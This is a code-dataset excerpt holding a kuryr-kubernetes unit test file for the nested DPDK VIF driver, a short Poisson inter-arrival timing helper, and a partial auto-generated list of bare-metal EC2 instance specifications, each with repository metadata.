|
Python
|
kuryr_kubernetes/tests/unit/controller/drivers/test_nested_dpdk.py
|
MaysaMacedo/kuryr-kubernetes-1
|
e4ba3896974e98dc46cb1afd9cbec42646250d72
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_nested_dpdk.py
|
MaysaMacedo/kuryr-kubernetes-1
|
e4ba3896974e98dc46cb1afd9cbec42646250d72
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_nested_dpdk.py
|
MaysaMacedo/kuryr-kubernetes-1
|
e4ba3896974e98dc46cb1afd9cbec42646250d72
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2020 Intel Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from kuryr_kubernetes.controller.drivers import nested_dpdk_vif
from kuryr_kubernetes.tests import base as test_base
from kuryr_kubernetes.tests.unit import kuryr_fixtures as k_fix
from openstack import exceptions as o_exc
@ddt.ddt
class TestNestedDpdkVIFDriver(test_base.TestCase):
    """Unit tests for NestedDpdkPodVIFDriver request/release/activate flows."""

    def _mock_driver(self):
        """Return (driver class, spec'd driver mock) shared by every test."""
        cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
        return cls, mock.Mock(spec=cls)

    @mock.patch(
        'kuryr_kubernetes.os_vif_util.neutron_to_osvif_vif_dpdk')
    @mock.patch('kuryr_kubernetes.controller.drivers.utils.get_network_id')
    def test_request_vif(self, m_get_network_id, m_to_vif):
        """Happy path: an interface is attached to the pod's parent VM."""
        cls, m_driver = self._mock_driver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        compute = self.useFixture(k_fix.MockComputeClient()).client

        pod = mock.sentinel.pod
        project_id = mock.sentinel.project_id
        subnets = mock.sentinel.subnets
        security_groups = mock.sentinel.security_groups
        vm_id = mock.sentinel.parent_port_id
        net_id = mock.sentinel.net_id
        port_id = mock.sentinel.port_id
        port = mock.sentinel.port
        vif = mock.Mock()

        parent_port = mock.MagicMock()
        parent_port.device_id = vm_id
        result = mock.Mock()
        result.port_id = port_id
        compute.create_server_interface.return_value = result
        m_to_vif.return_value = vif
        m_driver._get_parent_port.return_value = parent_port
        m_get_network_id.return_value = net_id
        os_net.get_port.return_value = port

        self.assertEqual(vif, cls.request_vif(m_driver, pod, project_id,
                                              subnets, security_groups))

        m_driver._get_parent_port.assert_called_once_with(pod)
        m_get_network_id.assert_called_once_with(subnets)
        compute.create_server_interface.assert_called_once_with(
            vm_id, net_id=net_id)
        os_net.get_port.assert_called_once_with(result.port_id)
        m_to_vif.assert_called_once_with(port, subnets, pod)

    @mock.patch(
        'kuryr_kubernetes.os_vif_util.neutron_to_osvif_vif_dpdk')
    @mock.patch('kuryr_kubernetes.controller.drivers.utils.get_network_id')
    def test_request_vif_parent_not_found(self, m_get_network_id, m_to_vif):
        """A failed parent-port lookup aborts the request before any attach."""
        cls, m_driver = self._mock_driver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        compute = self.useFixture(k_fix.MockComputeClient()).client

        pod = mock.sentinel.pod
        project_id = mock.sentinel.project_id
        subnets = mock.sentinel.subnets
        security_groups = mock.sentinel.security_groups

        # Wire the downstream mocks anyway; none of them may be reached.
        # (The original also built an unused parent_port MagicMock here;
        # that dead local has been dropped.)
        result = mock.Mock()
        result.port_id = mock.sentinel.port_id
        compute.create_server_interface.return_value = result
        m_to_vif.return_value = mock.Mock()
        m_get_network_id.return_value = mock.sentinel.net_id
        os_net.get_port.return_value = mock.sentinel.port
        m_driver._get_parent_port.side_effect = \
            o_exc.SDKException

        self.assertRaises(o_exc.SDKException, cls.request_vif,
                          m_driver, pod, project_id, subnets, security_groups)

        m_driver._get_parent_port.assert_called_once_with(pod)
        m_get_network_id.assert_not_called()
        compute.create_server_interface.assert_not_called()
        os_net.get_port.assert_not_called()
        m_to_vif.assert_not_called()

    @mock.patch(
        'kuryr_kubernetes.os_vif_util.neutron_to_osvif_vif_dpdk')
    @mock.patch('kuryr_kubernetes.controller.drivers.utils.get_network_id')
    def test_request_vif_attach_failed(self, m_get_network_id, m_to_vif):
        """An interface-attach failure propagates and halts the flow."""
        cls, m_driver = self._mock_driver()
        os_net = self.useFixture(k_fix.MockNetworkClient()).client
        compute = self.useFixture(k_fix.MockComputeClient()).client

        pod = mock.sentinel.pod
        project_id = mock.sentinel.project_id
        subnets = mock.sentinel.subnets
        security_groups = mock.sentinel.security_groups
        vm_id = mock.sentinel.parent_port_id
        net_id = mock.sentinel.net_id

        parent_port = mock.MagicMock()
        parent_port.device_id = vm_id
        m_to_vif.return_value = mock.Mock()
        m_driver._get_parent_port.return_value = parent_port
        m_get_network_id.return_value = net_id
        os_net.get_port.return_value = mock.sentinel.port
        # The attach itself blows up.
        compute.create_server_interface.side_effect = o_exc.SDKException

        self.assertRaises(o_exc.SDKException, cls.request_vif,
                          m_driver, pod, project_id, subnets, security_groups)

        m_driver._get_parent_port.assert_called_once_with(pod)
        m_get_network_id.assert_called_once_with(subnets)
        compute.create_server_interface.assert_called_once_with(
            vm_id, net_id=net_id)
        os_net.get_port.assert_not_called()
        m_to_vif.assert_not_called()

    def test_release_vif(self):
        """Releasing a VIF detaches its interface from the parent VM."""
        cls, m_driver = self._mock_driver()
        compute = self.useFixture(k_fix.MockComputeClient()).client

        pod = mock.sentinel.pod
        vif = mock.Mock()
        vif.id = mock.sentinel.port_id
        vm_id = mock.sentinel.vm_id
        vm_port = mock.MagicMock()
        vm_port.device_id = vm_id
        m_driver._get_parent_port.return_value = vm_port

        cls.release_vif(m_driver, pod, vif)

        m_driver._get_parent_port.assert_called_once_with(pod)
        compute.delete_server_interface.assert_called_once_with(
            vif.id, server=vm_id)

    def test_release_parent_not_found(self):
        """A failed parent-port lookup aborts the release before any detach."""
        cls, m_driver = self._mock_driver()
        compute = self.useFixture(k_fix.MockComputeClient()).client

        pod = mock.sentinel.pod
        vif = mock.Mock()
        vif.id = mock.sentinel.vif_id
        # (The original also built an unused parent_port MagicMock here;
        # that dead local has been dropped.)
        m_driver._get_parent_port.side_effect = \
            o_exc.SDKException

        self.assertRaises(o_exc.SDKException, cls.release_vif,
                          m_driver, pod, vif)

        m_driver._get_parent_port.assert_called_once_with(pod)
        compute.delete_server_interface.assert_not_called()

    def test_release_detach_failed(self):
        """A failed detach propagates to the caller."""
        cls, m_driver = self._mock_driver()
        compute = self.useFixture(k_fix.MockComputeClient()).client

        pod = mock.sentinel.pod
        vif = mock.Mock()
        vif.id = mock.sentinel.vif_id
        vm_id = mock.sentinel.parent_port_id
        parent_port = mock.MagicMock()
        parent_port.device_id = vm_id
        compute.delete_server_interface.side_effect = o_exc.SDKException
        m_driver._get_parent_port.return_value = parent_port

        self.assertRaises(o_exc.SDKException, cls.release_vif,
                          m_driver, pod, vif)

        m_driver._get_parent_port.assert_called_once_with(pod)
        compute.delete_server_interface.assert_called_once_with(
            vif.id, server=vm_id)

    @ddt.data((False), (True))
    def test_activate_vif(self, active_value):
        """activate_vif marks the VIF active regardless of its prior state."""
        cls, m_driver = self._mock_driver()

        pod = mock.sentinel.pod
        vif = mock.Mock()
        vif.active = active_value

        cls.activate_vif(m_driver, pod, vif)

        self.assertEqual(vif.active, True)
| 37.605263
| 78
| 0.691393
| 1,158
| 8,574
| 4.752159
| 0.131261
| 0.074141
| 0.045793
| 0.050881
| 0.815192
| 0.794294
| 0.781029
| 0.757223
| 0.751408
| 0.737779
| 0
| 0.001212
| 0.230464
| 8,574
| 227
| 79
| 37.770925
| 0.832828
| 0.070795
| 0
| 0.797619
| 0
| 0
| 0.041499
| 0.041499
| 0
| 0
| 0
| 0
| 0.160714
| 1
| 0.041667
| false
| 0
| 0.035714
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43aab7e1ab13649bf8b4a49237ed5a80f051fa41
| 198
|
py
|
Python
|
Trabalho/trab_SD/pubSub/pois.py
|
Digas-2/trab_sd
|
7d9f62143e7a0a844e9a5e4d19655ef0f61b7b36
|
[
"Apache-2.0"
] | null | null | null |
Trabalho/trab_SD/pubSub/pois.py
|
Digas-2/trab_sd
|
7d9f62143e7a0a844e9a5e4d19655ef0f61b7b36
|
[
"Apache-2.0"
] | null | null | null |
Trabalho/trab_SD/pubSub/pois.py
|
Digas-2/trab_sd
|
7d9f62143e7a0a844e9a5e4d19655ef0f61b7b36
|
[
"Apache-2.0"
] | null | null | null |
import math
import random


def nextTime(rateParameter):
    """Draw one exponentially distributed waiting time for the given rate."""
    uniform_draw = random.random()
    # Inverse-CDF sampling of the exponential distribution.
    return -math.log(1.0 - uniform_draw) / rateParameter


def PoisTime(n_events, time_interval):
    """Inter-event time for a Poisson process with n_events per time_interval."""
    rate = n_events / time_interval
    return nextTime(rate)
| 24.75
| 59
| 0.772727
| 27
| 198
| 5.518519
| 0.555556
| 0.09396
| 0.147651
| 0.255034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011561
| 0.126263
| 198
| 8
| 60
| 24.75
| 0.849711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
43b4a3db5773090f9e78a700e8eccbfcdb3d6463
| 25,860
|
py
|
Python
|
ec2_compare/internal/bare_metal/true.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/bare_metal/true.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/bare_metal/true.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 4.0, 'DefaultVCpus': 48, 'SizeInMiB': 393216, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'z1d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 
'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 4.0}, 'VCpuInfo': {'DefaultVCpus': 48}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 
'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 262144, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 
'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 262144}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 262144, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 262144}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 
'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 524288, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 524288}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 524288, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 
'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 524288}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72}, 'MemoryInfo': {'SizeInMiB': 
196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 72, 'SizeInMiB': 524288, 'TotalSizeInGB': 15200, 'Disks': [{'SizeInGB': 1900, 'Count': 8, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 72}, 'MemoryInfo': {'SizeInMiB': 524288}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 15200, 'Disks': [{'SizeInGB': 1900, 'Count': 8, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': 
True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 
